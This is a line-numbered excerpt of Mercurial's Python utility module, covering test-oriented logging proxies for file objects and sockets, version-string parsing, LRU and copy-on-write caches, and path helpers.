559 557 def read(self, *args, **kwargs):
560 558 return object.__getattribute__(self, r'_observedcall')(
561 559 r'read', *args, **kwargs)
562 560
563 561 def readall(self, *args, **kwargs):
564 562 return object.__getattribute__(self, r'_observedcall')(
565 563 r'readall', *args, **kwargs)
566 564
567 565 def readinto(self, *args, **kwargs):
568 566 return object.__getattribute__(self, r'_observedcall')(
569 567 r'readinto', *args, **kwargs)
570 568
571 569 def write(self, *args, **kwargs):
572 570 return object.__getattribute__(self, r'_observedcall')(
573 571 r'write', *args, **kwargs)
574 572
575 573 def detach(self, *args, **kwargs):
576 574 return object.__getattribute__(self, r'_observedcall')(
577 575 r'detach', *args, **kwargs)
578 576
579 577 def read1(self, *args, **kwargs):
580 578 return object.__getattribute__(self, r'_observedcall')(
581 579 r'read1', *args, **kwargs)
582 580
583 581 class observedbufferedinputpipe(bufferedinputpipe):
584 582 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
585 583
586 584 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
587 585 bypass ``fileobjectproxy``. Because of this, we need to make
588 586 ``bufferedinputpipe`` aware of these operations.
589 587
590 588 This variation of ``bufferedinputpipe`` can notify observers about
591 589 ``os.read()`` events. It also re-publishes other events, such as
592 590 ``read()`` and ``readline()``.
593 591 """
594 592 def _fillbuffer(self):
595 593 res = super(observedbufferedinputpipe, self)._fillbuffer()
596 594
597 595 fn = getattr(self._input._observer, r'osread', None)
598 596 if fn:
599 597 fn(res, _chunksize)
600 598
601 599 return res
602 600
603 601 # We use different observer methods because the operation isn't
604 602 # performed on the actual file object but on us.
605 603 def read(self, size):
606 604 res = super(observedbufferedinputpipe, self).read(size)
607 605
608 606 fn = getattr(self._input._observer, r'bufferedread', None)
609 607 if fn:
610 608 fn(res, size)
611 609
612 610 return res
613 611
614 612 def readline(self, *args, **kwargs):
615 613 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
616 614
617 615 fn = getattr(self._input._observer, r'bufferedreadline', None)
618 616 if fn:
619 617 fn(res)
620 618
621 619 return res
622 620
623 621 PROXIED_SOCKET_METHODS = {
624 622 r'makefile',
625 623 r'recv',
626 624 r'recvfrom',
627 625 r'recvfrom_into',
628 626 r'recv_into',
629 627 r'send',
630 628 r'sendall',
631 629 r'sendto',
632 630 r'setblocking',
633 631 r'settimeout',
634 632 r'gettimeout',
635 633 r'setsockopt',
636 634 }
637 635
638 636 class socketproxy(object):
639 637 """A proxy around a socket that tells a watcher when events occur.
640 638
641 639 This is like ``fileobjectproxy`` except for sockets.
642 640
643 641 This type is intended to only be used for testing purposes. Think hard
644 642 before using it in important code.
645 643 """
646 644 __slots__ = (
647 645 r'_orig',
648 646 r'_observer',
649 647 )
650 648
651 649 def __init__(self, sock, observer):
652 650 object.__setattr__(self, r'_orig', sock)
653 651 object.__setattr__(self, r'_observer', observer)
654 652
655 653 def __getattribute__(self, name):
656 654 if name in PROXIED_SOCKET_METHODS:
657 655 return object.__getattribute__(self, name)
658 656
659 657 return getattr(object.__getattribute__(self, r'_orig'), name)
660 658
661 659 def __delattr__(self, name):
662 660 return delattr(object.__getattribute__(self, r'_orig'), name)
663 661
664 662 def __setattr__(self, name, value):
665 663 return setattr(object.__getattribute__(self, r'_orig'), name, value)
666 664
667 665 def __nonzero__(self):
668 666 return bool(object.__getattribute__(self, r'_orig'))
669 667
670 668 __bool__ = __nonzero__
671 669
672 670 def _observedcall(self, name, *args, **kwargs):
673 671 # Call the original object.
674 672 orig = object.__getattribute__(self, r'_orig')
675 673 res = getattr(orig, name)(*args, **kwargs)
676 674
677 675 # Call a method on the observer of the same name with arguments
678 676 # so it can react, log, etc.
679 677 observer = object.__getattribute__(self, r'_observer')
680 678 fn = getattr(observer, name, None)
681 679 if fn:
682 680 fn(res, *args, **kwargs)
683 681
684 682 return res
685 683
686 684 def makefile(self, *args, **kwargs):
687 685 res = object.__getattribute__(self, r'_observedcall')(
688 686 r'makefile', *args, **kwargs)
689 687
690 688 # The file object may be used for I/O. So we turn it into a
691 689 # proxy using our observer.
692 690 observer = object.__getattribute__(self, r'_observer')
693 691 return makeloggingfileobject(observer.fh, res, observer.name,
694 692 reads=observer.reads,
695 693 writes=observer.writes,
696 694 logdata=observer.logdata,
697 695 logdataapis=observer.logdataapis)
698 696
699 697 def recv(self, *args, **kwargs):
700 698 return object.__getattribute__(self, r'_observedcall')(
701 699 r'recv', *args, **kwargs)
702 700
703 701 def recvfrom(self, *args, **kwargs):
704 702 return object.__getattribute__(self, r'_observedcall')(
705 703 r'recvfrom', *args, **kwargs)
706 704
707 705 def recvfrom_into(self, *args, **kwargs):
708 706 return object.__getattribute__(self, r'_observedcall')(
709 707 r'recvfrom_into', *args, **kwargs)
710 708
711 709 def recv_into(self, *args, **kwargs):
712 710 return object.__getattribute__(self, r'_observedcall')(
713 711 r'recv_info', *args, **kwargs)
714 712
715 713 def send(self, *args, **kwargs):
716 714 return object.__getattribute__(self, r'_observedcall')(
717 715 r'send', *args, **kwargs)
718 716
719 717 def sendall(self, *args, **kwargs):
720 718 return object.__getattribute__(self, r'_observedcall')(
721 719 r'sendall', *args, **kwargs)
722 720
723 721 def sendto(self, *args, **kwargs):
724 722 return object.__getattribute__(self, r'_observedcall')(
725 723 r'sendto', *args, **kwargs)
726 724
727 725 def setblocking(self, *args, **kwargs):
728 726 return object.__getattribute__(self, r'_observedcall')(
729 727 r'setblocking', *args, **kwargs)
730 728
731 729 def settimeout(self, *args, **kwargs):
732 730 return object.__getattribute__(self, r'_observedcall')(
733 731 r'settimeout', *args, **kwargs)
734 732
735 733 def gettimeout(self, *args, **kwargs):
736 734 return object.__getattribute__(self, r'_observedcall')(
737 735 r'gettimeout', *args, **kwargs)
738 736
739 737 def setsockopt(self, *args, **kwargs):
740 738 return object.__getattribute__(self, r'_observedcall')(
741 739 r'setsockopt', *args, **kwargs)
742 740
743 741 class baseproxyobserver(object):
744 742 def _writedata(self, data):
745 743 if not self.logdata:
746 744 if self.logdataapis:
747 745 self.fh.write('\n')
748 746 self.fh.flush()
749 747 return
750 748
751 749 # Simple case writes all data on a single line.
752 750 if b'\n' not in data:
753 751 if self.logdataapis:
754 752 self.fh.write(': %s\n' % stringutil.escapestr(data))
755 753 else:
756 754 self.fh.write('%s> %s\n'
757 755 % (self.name, stringutil.escapestr(data)))
758 756 self.fh.flush()
759 757 return
760 758
761 759 # Data with newlines is written to multiple lines.
762 760 if self.logdataapis:
763 761 self.fh.write(':\n')
764 762
765 763 lines = data.splitlines(True)
766 764 for line in lines:
767 765 self.fh.write('%s> %s\n'
768 766 % (self.name, stringutil.escapestr(line)))
769 767 self.fh.flush()
770 768
771 769 class fileobjectobserver(baseproxyobserver):
772 770 """Logs file object activity."""
773 771 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
774 772 logdataapis=True):
775 773 self.fh = fh
776 774 self.name = name
777 775 self.logdata = logdata
778 776 self.logdataapis = logdataapis
779 777 self.reads = reads
780 778 self.writes = writes
781 779
782 780 def read(self, res, size=-1):
783 781 if not self.reads:
784 782 return
785 783 # Python 3 can return None from reads at EOF instead of empty strings.
786 784 if res is None:
787 785 res = ''
788 786
789 787 if self.logdataapis:
790 788 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
791 789
792 790 self._writedata(res)
793 791
794 792 def readline(self, res, limit=-1):
795 793 if not self.reads:
796 794 return
797 795
798 796 if self.logdataapis:
799 797 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
800 798
801 799 self._writedata(res)
802 800
803 801 def readinto(self, res, dest):
804 802 if not self.reads:
805 803 return
806 804
807 805 if self.logdataapis:
808 806 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
809 807 res))
810 808
811 809 data = dest[0:res] if res is not None else b''
812 810 self._writedata(data)
813 811
814 812 def write(self, res, data):
815 813 if not self.writes:
816 814 return
817 815
818 816 # Python 2 returns None from some write() calls. Python 3 (reasonably)
819 817 # returns the integer bytes written.
820 818 if res is None and data:
821 819 res = len(data)
822 820
823 821 if self.logdataapis:
824 822 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
825 823
826 824 self._writedata(data)
827 825
828 826 def flush(self, res):
829 827 if not self.writes:
830 828 return
831 829
832 830 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
833 831
834 832 # For observedbufferedinputpipe.
835 833 def bufferedread(self, res, size):
836 834 if not self.reads:
837 835 return
838 836
839 837 if self.logdataapis:
840 838 self.fh.write('%s> bufferedread(%d) -> %d' % (
841 839 self.name, size, len(res)))
842 840
843 841 self._writedata(res)
844 842
845 843 def bufferedreadline(self, res):
846 844 if not self.reads:
847 845 return
848 846
849 847 if self.logdataapis:
850 848 self.fh.write('%s> bufferedreadline() -> %d' % (
851 849 self.name, len(res)))
852 850
853 851 self._writedata(res)
854 852
855 853 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
856 854 logdata=False, logdataapis=True):
857 855 """Turn a file object into a logging file object."""
858 856
859 857 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
860 858 logdata=logdata, logdataapis=logdataapis)
861 859 return fileobjectproxy(fh, observer)
862 860
863 861 class socketobserver(baseproxyobserver):
864 862 """Logs socket activity."""
865 863 def __init__(self, fh, name, reads=True, writes=True, states=True,
866 864 logdata=False, logdataapis=True):
867 865 self.fh = fh
868 866 self.name = name
869 867 self.reads = reads
870 868 self.writes = writes
871 869 self.states = states
872 870 self.logdata = logdata
873 871 self.logdataapis = logdataapis
874 872
875 873 def makefile(self, res, mode=None, bufsize=None):
876 874 if not self.states:
877 875 return
878 876
879 877 self.fh.write('%s> makefile(%r, %r)\n' % (
880 878 self.name, mode, bufsize))
881 879
882 880 def recv(self, res, size, flags=0):
883 881 if not self.reads:
884 882 return
885 883
886 884 if self.logdataapis:
887 885 self.fh.write('%s> recv(%d, %d) -> %d' % (
888 886 self.name, size, flags, len(res)))
889 887 self._writedata(res)
890 888
891 889 def recvfrom(self, res, size, flags=0):
892 890 if not self.reads:
893 891 return
894 892
895 893 if self.logdataapis:
896 894 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
897 895 self.name, size, flags, len(res[0])))
898 896
899 897 self._writedata(res[0])
900 898
901 899 def recvfrom_into(self, res, buf, size, flags=0):
902 900 if not self.reads:
903 901 return
904 902
905 903 if self.logdataapis:
906 904 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
907 905 self.name, size, flags, res[0]))
908 906
909 907 self._writedata(buf[0:res[0]])
910 908
911 909 def recv_into(self, res, buf, size=0, flags=0):
912 910 if not self.reads:
913 911 return
914 912
915 913 if self.logdataapis:
916 914 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
917 915 self.name, size, flags, res))
918 916
919 917 self._writedata(buf[0:res])
920 918
921 919 def send(self, res, data, flags=0):
922 920 if not self.writes:
923 921 return
924 922
925 923 self.fh.write('%s> send(%d, %d) -> %d' % (
926 924 self.name, len(data), flags, len(res)))
927 925 self._writedata(data)
928 926
929 927 def sendall(self, res, data, flags=0):
930 928 if not self.writes:
931 929 return
932 930
933 931 if self.logdataapis:
934 932 # Returns None on success. So don't bother reporting return value.
935 933 self.fh.write('%s> sendall(%d, %d)' % (
936 934 self.name, len(data), flags))
937 935
938 936 self._writedata(data)
939 937
940 938 def sendto(self, res, data, flagsoraddress, address=None):
941 939 if not self.writes:
942 940 return
943 941
944 942 if address:
945 943 flags = flagsoraddress
946 944 else:
947 945 flags = 0
948 946
949 947 if self.logdataapis:
950 948 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
951 949 self.name, len(data), flags, address, res))
952 950
953 951 self._writedata(data)
954 952
955 953 def setblocking(self, res, flag):
956 954 if not self.states:
957 955 return
958 956
959 957 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
960 958
961 959 def settimeout(self, res, value):
962 960 if not self.states:
963 961 return
964 962
965 963 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
966 964
967 965 def gettimeout(self, res):
968 966 if not self.states:
969 967 return
970 968
971 969 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
972 970
973 971 def setsockopt(self, level, optname, value):
974 972 if not self.states:
975 973 return
976 974
977 975 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
978 976 self.name, level, optname, value))
979 977
980 978 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
981 979 logdata=False, logdataapis=True):
982 980 """Turn a socket into a logging socket."""
983 981
984 982 observer = socketobserver(logh, name, reads=reads, writes=writes,
985 983 states=states, logdata=logdata,
986 984 logdataapis=logdataapis)
987 985 return socketproxy(fh, observer)
988 986
989 987 def version():
990 988 """Return version information if available."""
991 989 try:
992 990 from . import __version__
993 991 return __version__.version
994 992 except ImportError:
995 993 return 'unknown'
996 994
997 995 def versiontuple(v=None, n=4):
998 996 """Parses a Mercurial version string into an N-tuple.
999 997
1000 998 The version string to be parsed is specified with the ``v`` argument.
1001 999 If it isn't defined, the current Mercurial version string will be parsed.
1002 1000
1003 1001 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1004 1002 returned values:
1005 1003
1006 1004 >>> v = b'3.6.1+190-df9b73d2d444'
1007 1005 >>> versiontuple(v, 2)
1008 1006 (3, 6)
1009 1007 >>> versiontuple(v, 3)
1010 1008 (3, 6, 1)
1011 1009 >>> versiontuple(v, 4)
1012 1010 (3, 6, 1, '190-df9b73d2d444')
1013 1011
1014 1012 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1015 1013 (3, 6, 1, '190-df9b73d2d444+20151118')
1016 1014
1017 1015 >>> v = b'3.6'
1018 1016 >>> versiontuple(v, 2)
1019 1017 (3, 6)
1020 1018 >>> versiontuple(v, 3)
1021 1019 (3, 6, None)
1022 1020 >>> versiontuple(v, 4)
1023 1021 (3, 6, None, None)
1024 1022
1025 1023 >>> v = b'3.9-rc'
1026 1024 >>> versiontuple(v, 2)
1027 1025 (3, 9)
1028 1026 >>> versiontuple(v, 3)
1029 1027 (3, 9, None)
1030 1028 >>> versiontuple(v, 4)
1031 1029 (3, 9, None, 'rc')
1032 1030
1033 1031 >>> v = b'3.9-rc+2-02a8fea4289b'
1034 1032 >>> versiontuple(v, 2)
1035 1033 (3, 9)
1036 1034 >>> versiontuple(v, 3)
1037 1035 (3, 9, None)
1038 1036 >>> versiontuple(v, 4)
1039 1037 (3, 9, None, 'rc+2-02a8fea4289b')
1040 1038
1041 1039 >>> versiontuple(b'4.6rc0')
1042 1040 (4, 6, None, 'rc0')
1043 1041 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1044 1042 (4, 6, None, 'rc0+12-425d55e54f98')
1045 1043 >>> versiontuple(b'.1.2.3')
1046 1044 (None, None, None, '.1.2.3')
1047 1045 >>> versiontuple(b'12.34..5')
1048 1046 (12, 34, None, '..5')
1049 1047 >>> versiontuple(b'1.2.3.4.5.6')
1050 1048 (1, 2, 3, '.4.5.6')
1051 1049 """
1052 1050 if not v:
1053 1051 v = version()
1054 1052 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1055 1053 if not m:
1056 1054 vparts, extra = '', v
1057 1055 elif m.group(2):
1058 1056 vparts, extra = m.groups()
1059 1057 else:
1060 1058 vparts, extra = m.group(1), None
1061 1059
1062 1060 vints = []
1063 1061 for i in vparts.split('.'):
1064 1062 try:
1065 1063 vints.append(int(i))
1066 1064 except ValueError:
1067 1065 break
1068 1066 # (3, 6) -> (3, 6, None)
1069 1067 while len(vints) < 3:
1070 1068 vints.append(None)
1071 1069
1072 1070 if n == 2:
1073 1071 return (vints[0], vints[1])
1074 1072 if n == 3:
1075 1073 return (vints[0], vints[1], vints[2])
1076 1074 if n == 4:
1077 1075 return (vints[0], vints[1], vints[2], extra)
1078 1076
1079 1077 def cachefunc(func):
1080 1078 '''cache the result of function calls'''
1081 1079 # XXX doesn't handle keywords args
1082 1080 if func.__code__.co_argcount == 0:
1083 1081 cache = []
1084 1082 def f():
1085 1083 if len(cache) == 0:
1086 1084 cache.append(func())
1087 1085 return cache[0]
1088 1086 return f
1089 1087 cache = {}
1090 1088 if func.__code__.co_argcount == 1:
1091 1089 # we gain a small amount of time because
1092 1090 # we don't need to pack/unpack the list
1093 1091 def f(arg):
1094 1092 if arg not in cache:
1095 1093 cache[arg] = func(arg)
1096 1094 return cache[arg]
1097 1095 else:
1098 1096 def f(*args):
1099 1097 if args not in cache:
1100 1098 cache[args] = func(*args)
1101 1099 return cache[args]
1102 1100
1103 1101 return f
1104 1102
1105 1103 class cow(object):
1106 1104 """helper class to make copy-on-write easier
1107 1105
1108 1106 Call preparewrite before doing any writes.
1109 1107 """
1110 1108
1111 1109 def preparewrite(self):
1112 1110 """call this before writes, return self or a copied new object"""
1113 1111 if getattr(self, '_copied', 0):
1114 1112 self._copied -= 1
1115 1113 return self.__class__(self)
1116 1114 return self
1117 1115
1118 1116 def copy(self):
1119 1117 """always do a cheap copy"""
1120 1118 self._copied = getattr(self, '_copied', 0) + 1
1121 1119 return self
1122 1120
1123 1121 class sortdict(collections.OrderedDict):
1124 1122 '''a simple sorted dictionary
1125 1123
1126 1124 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1127 1125 >>> d2 = d1.copy()
1128 1126 >>> d2
1129 1127 sortdict([('a', 0), ('b', 1)])
1130 1128 >>> d2.update([(b'a', 2)])
1131 1129 >>> list(d2.keys()) # should still be in last-set order
1132 1130 ['b', 'a']
1133 1131 '''
1134 1132
1135 1133 def __setitem__(self, key, value):
1136 1134 if key in self:
1137 1135 del self[key]
1138 1136 super(sortdict, self).__setitem__(key, value)
1139 1137
1140 1138 if pycompat.ispypy:
1141 1139 # __setitem__() isn't called as of PyPy 5.8.0
1142 1140 def update(self, src):
1143 1141 if isinstance(src, dict):
1144 1142 src = src.iteritems()
1145 1143 for k, v in src:
1146 1144 self[k] = v
1147 1145
1148 1146 class cowdict(cow, dict):
1149 1147 """copy-on-write dict
1150 1148
1151 1149 Be sure to call d = d.preparewrite() before writing to d.
1152 1150
1153 1151 >>> a = cowdict()
1154 1152 >>> a is a.preparewrite()
1155 1153 True
1156 1154 >>> b = a.copy()
1157 1155 >>> b is a
1158 1156 True
1159 1157 >>> c = b.copy()
1160 1158 >>> c is a
1161 1159 True
1162 1160 >>> a = a.preparewrite()
1163 1161 >>> b is a
1164 1162 False
1165 1163 >>> a is a.preparewrite()
1166 1164 True
1167 1165 >>> c = c.preparewrite()
1168 1166 >>> b is c
1169 1167 False
1170 1168 >>> b is b.preparewrite()
1171 1169 True
1172 1170 """
1173 1171
1174 1172 class cowsortdict(cow, sortdict):
1175 1173 """copy-on-write sortdict
1176 1174
1177 1175 Be sure to call d = d.preparewrite() before writing to d.
1178 1176 """
1179 1177
1180 1178 class transactional(object):
1181 1179 """Base class for making a transactional type into a context manager."""
1182 1180 __metaclass__ = abc.ABCMeta
1183 1181
1184 1182 @abc.abstractmethod
1185 1183 def close(self):
1186 1184 """Successfully closes the transaction."""
1187 1185
1188 1186 @abc.abstractmethod
1189 1187 def release(self):
1190 1188 """Marks the end of the transaction.
1191 1189
1192 1190 If the transaction has not been closed, it will be aborted.
1193 1191 """
1194 1192
1195 1193 def __enter__(self):
1196 1194 return self
1197 1195
1198 1196 def __exit__(self, exc_type, exc_val, exc_tb):
1199 1197 try:
1200 1198 if exc_type is None:
1201 1199 self.close()
1202 1200 finally:
1203 1201 self.release()
1204 1202
1205 1203 @contextlib.contextmanager
1206 1204 def acceptintervention(tr=None):
1207 1205 """A context manager that closes the transaction on InterventionRequired
1208 1206
1209 1207 If no transaction was provided, this simply runs the body and returns
1210 1208 """
1211 1209 if not tr:
1212 1210 yield
1213 1211 return
1214 1212 try:
1215 1213 yield
1216 1214 tr.close()
1217 1215 except error.InterventionRequired:
1218 1216 tr.close()
1219 1217 raise
1220 1218 finally:
1221 1219 tr.release()
1222 1220
1223 1221 @contextlib.contextmanager
1224 1222 def nullcontextmanager():
1225 1223 yield
1226 1224
1227 1225 class _lrucachenode(object):
1228 1226 """A node in a doubly linked list.
1229 1227
1230 1228 Holds a reference to nodes on either side as well as a key-value
1231 1229 pair for the dictionary entry.
1232 1230 """
1233 1231 __slots__ = (u'next', u'prev', u'key', u'value')
1234 1232
1235 1233 def __init__(self):
1236 1234 self.next = None
1237 1235 self.prev = None
1238 1236
1239 1237 self.key = _notset
1240 1238 self.value = None
1241 1239
1242 1240 def markempty(self):
1243 1241 """Mark the node as emptied."""
1244 1242 self.key = _notset
1245 1243
1246 1244 class lrucachedict(object):
1247 1245 """Dict that caches most recent accesses and sets.
1248 1246
1249 1247 The dict consists of an actual backing dict - indexed by original
1250 1248 key - and a doubly linked circular list defining the order of entries in
1251 1249 the cache.
1252 1250
1253 1251 The head node is the newest entry in the cache. If the cache is full,
1254 1252 we recycle head.prev and make it the new head. Cache accesses result in
1255 1253 the node being moved to before the existing head and being marked as the
1256 1254 new head node.
1257 1255 """
1258 1256 def __init__(self, max):
1259 1257 self._cache = {}
1260 1258
1261 1259 self._head = head = _lrucachenode()
1262 1260 head.prev = head
1263 1261 head.next = head
1264 1262 self._size = 1
1265 1263 self._capacity = max
1266 1264
1267 1265 def __len__(self):
1268 1266 return len(self._cache)
1269 1267
1270 1268 def __contains__(self, k):
1271 1269 return k in self._cache
1272 1270
1273 1271 def __iter__(self):
1274 1272 # We don't have to iterate in cache order, but why not.
1275 1273 n = self._head
1276 1274 for i in range(len(self._cache)):
1277 1275 yield n.key
1278 1276 n = n.next
1279 1277
1280 1278 def __getitem__(self, k):
1281 1279 node = self._cache[k]
1282 1280 self._movetohead(node)
1283 1281 return node.value
1284 1282
1285 1283 def __setitem__(self, k, v):
1286 1284 node = self._cache.get(k)
1287 1285 # Replace existing value and mark as newest.
1288 1286 if node is not None:
1289 1287 node.value = v
1290 1288 self._movetohead(node)
1291 1289 return
1292 1290
1293 1291 if self._size < self._capacity:
1294 1292 node = self._addcapacity()
1295 1293 else:
1296 1294 # Grab the last/oldest item.
1297 1295 node = self._head.prev
1298 1296
1299 1297 # At capacity. Kill the old entry.
1300 1298 if node.key is not _notset:
1301 1299 del self._cache[node.key]
1302 1300
1303 1301 node.key = k
1304 1302 node.value = v
1305 1303 self._cache[k] = node
1306 1304 # And mark it as newest entry. No need to adjust order since it
1307 1305 # is already self._head.prev.
1308 1306 self._head = node
1309 1307
1310 1308 def __delitem__(self, k):
1311 1309 node = self._cache.pop(k)
1312 1310 node.markempty()
1313 1311
1314 1312 # Temporarily mark as newest item before re-adjusting head to make
1315 1313 # this node the oldest item.
1316 1314 self._movetohead(node)
1317 1315 self._head = node.next
1318 1316
1319 1317 # Additional dict methods.
1320 1318
1321 1319 def get(self, k, default=None):
1322 1320 try:
1323 1321 return self._cache[k].value
1324 1322 except KeyError:
1325 1323 return default
1326 1324
1327 1325 def clear(self):
1328 1326 n = self._head
1329 1327 while n.key is not _notset:
1330 1328 n.markempty()
1331 1329 n = n.next
1332 1330
1333 1331 self._cache.clear()
1334 1332
1335 1333 def copy(self):
1336 1334 result = lrucachedict(self._capacity)
1337 1335 n = self._head.prev
1338 1336 # Iterate in oldest-to-newest order, so the copy has the right ordering
1339 1337 for i in range(len(self._cache)):
1340 1338 result[n.key] = n.value
1341 1339 n = n.prev
1342 1340 return result
1343 1341
1344 1342 def _movetohead(self, node):
1345 1343 """Mark a node as the newest, making it the new head.
1346 1344
1347 1345 When a node is accessed, it becomes the freshest entry in the LRU
1348 1346 list, which is denoted by self._head.
1349 1347
1350 1348 Visually, let's make ``N`` the new head node (* denotes head):
1351 1349
1352 1350 previous/oldest <-> head <-> next/next newest
1353 1351
1354 1352 ----<->--- A* ---<->-----
1355 1353 | |
1356 1354 E <-> D <-> N <-> C <-> B
1357 1355
1358 1356 To:
1359 1357
1360 1358 ----<->--- N* ---<->-----
1361 1359 | |
1362 1360 E <-> D <-> C <-> B <-> A
1363 1361
1364 1362 This requires the following moves:
1365 1363
1366 1364 C.next = D (node.prev.next = node.next)
1367 1365 D.prev = C (node.next.prev = node.prev)
1368 1366 E.next = N (head.prev.next = node)
1369 1367 N.prev = E (node.prev = head.prev)
1370 1368 N.next = A (node.next = head)
1371 1369 A.prev = N (head.prev = node)
1372 1370 """
1373 1371 head = self._head
1374 1372 # C.next = D
1375 1373 node.prev.next = node.next
1376 1374 # D.prev = C
1377 1375 node.next.prev = node.prev
1378 1376 # N.prev = E
1379 1377 node.prev = head.prev
1380 1378 # N.next = A
1381 1379 # It is tempting to do just "head" here, however if node is
1382 1380 # adjacent to head, this will do bad things.
1383 1381 node.next = head.prev.next
1384 1382 # E.next = N
1385 1383 node.next.prev = node
1386 1384 # A.prev = N
1387 1385 node.prev.next = node
1388 1386
1389 1387 self._head = node
1390 1388
1391 1389 def _addcapacity(self):
1392 1390 """Add a node to the circular linked list.
1393 1391
1394 1392 The new node is inserted before the head node.
1395 1393 """
1396 1394 head = self._head
1397 1395 node = _lrucachenode()
1398 1396 head.prev.next = node
1399 1397 node.prev = head.prev
1400 1398 node.next = head
1401 1399 head.prev = node
1402 1400 self._size += 1
1403 1401 return node
1404 1402
1405 1403 def lrucachefunc(func):
1406 1404 '''cache most recent results of function calls'''
1407 1405 cache = {}
1408 1406 order = collections.deque()
1409 1407 if func.__code__.co_argcount == 1:
1410 1408 def f(arg):
1411 1409 if arg not in cache:
1412 1410 if len(cache) > 20:
1413 1411 del cache[order.popleft()]
1414 1412 cache[arg] = func(arg)
1415 1413 else:
1416 1414 order.remove(arg)
1417 1415 order.append(arg)
1418 1416 return cache[arg]
1419 1417 else:
1420 1418 def f(*args):
1421 1419 if args not in cache:
1422 1420 if len(cache) > 20:
1423 1421 del cache[order.popleft()]
1424 1422 cache[args] = func(*args)
1425 1423 else:
1426 1424 order.remove(args)
1427 1425 order.append(args)
1428 1426 return cache[args]
1429 1427
1430 1428 return f
1431 1429
1432 1430 class propertycache(object):
1433 1431 def __init__(self, func):
1434 1432 self.func = func
1435 1433 self.name = func.__name__
1436 1434 def __get__(self, obj, type=None):
1437 1435 result = self.func(obj)
1438 1436 self.cachevalue(obj, result)
1439 1437 return result
1440 1438
1441 1439 def cachevalue(self, obj, value):
1442 1440 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1443 1441 obj.__dict__[self.name] = value
1444 1442
1445 1443 def clearcachedproperty(obj, prop):
1446 1444 '''clear a cached property value, if one has been set'''
1447 1445 if prop in obj.__dict__:
1448 1446 del obj.__dict__[prop]
1449 1447
1450 1448 def increasingchunks(source, min=1024, max=65536):
1451 1449 '''return no less than min bytes per chunk while data remains,
1452 1450 doubling min after each chunk until it reaches max'''
1453 1451 def log2(x):
1454 1452 if not x:
1455 1453 return 0
1456 1454 i = 0
1457 1455 while x:
1458 1456 x >>= 1
1459 1457 i += 1
1460 1458 return i - 1
1461 1459
1462 1460 buf = []
1463 1461 blen = 0
1464 1462 for chunk in source:
1465 1463 buf.append(chunk)
1466 1464 blen += len(chunk)
1467 1465 if blen >= min:
1468 1466 if min < max:
1469 1467 min = min << 1
1470 1468 nmin = 1 << log2(blen)
1471 1469 if nmin > min:
1472 1470 min = nmin
1473 1471 if min > max:
1474 1472 min = max
1475 1473 yield ''.join(buf)
1476 1474 blen = 0
1477 1475 buf = []
1478 1476 if buf:
1479 1477 yield ''.join(buf)
1480 1478
1481 1479 def always(fn):
1482 1480 return True
1483 1481
1484 1482 def never(fn):
1485 1483 return False
1486 1484
1487 1485 def nogc(func):
1488 1486 """disable garbage collector
1489 1487
1490 1488 Python's garbage collector triggers a GC each time a certain number of
1491 1489 container objects (the number being defined by gc.get_threshold()) are
1492 1490 allocated even when marked not to be tracked by the collector. Tracking has
1493 1491 no effect on when GCs are triggered, only on what objects the GC looks
1494 1492 into. As a workaround, disable GC while building complex (huge)
1495 1493 containers.
1496 1494
1497 1495 This garbage collector issue have been fixed in 2.7. But it still affect
1498 1496 CPython's performance.
1499 1497 """
1500 1498 def wrapper(*args, **kwargs):
1501 1499 gcenabled = gc.isenabled()
1502 1500 gc.disable()
1503 1501 try:
1504 1502 return func(*args, **kwargs)
1505 1503 finally:
1506 1504 if gcenabled:
1507 1505 gc.enable()
1508 1506 return wrapper
1509 1507
1510 1508 if pycompat.ispypy:
1511 1509 # PyPy runs slower with gc disabled
1512 1510 nogc = lambda x: x
1513 1511
1514 1512 def pathto(root, n1, n2):
1515 1513 '''return the relative path from one place to another.
1516 1514 root should use os.sep to separate directories
1517 1515 n1 should use os.sep to separate directories
1518 1516 n2 should use "/" to separate directories
1519 1517 returns an os.sep-separated path.
1520 1518
1521 1519 If n1 is a relative path, it's assumed it's
1522 1520 relative to root.
1523 1521 n2 should always be relative to root.
1524 1522 '''
1525 1523 if not n1:
1526 1524 return localpath(n2)
1527 1525 if os.path.isabs(n1):
1528 1526 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1529 1527 return os.path.join(root, localpath(n2))
1530 1528 n2 = '/'.join((pconvert(root), n2))
1531 1529 a, b = splitpath(n1), n2.split('/')
1532 1530 a.reverse()
1533 1531 b.reverse()
1534 1532 while a and b and a[-1] == b[-1]:
1535 1533 a.pop()
1536 1534 b.pop()
1537 1535 b.reverse()
1538 1536 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1539 1537
1540 1538 # the location of data files matching the source code
1541 1539 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1542 1540 # executable version (py2exe) doesn't support __file__
1543 1541 datapath = os.path.dirname(pycompat.sysexecutable)
1544 1542 else:
1545 1543 datapath = os.path.dirname(pycompat.fsencode(__file__))
1546 1544
1547 1545 i18n.setdatapath(datapath)
1548 1546
1549 1547 def checksignature(func):
1550 1548 '''wrap a function with code to check for calling errors'''
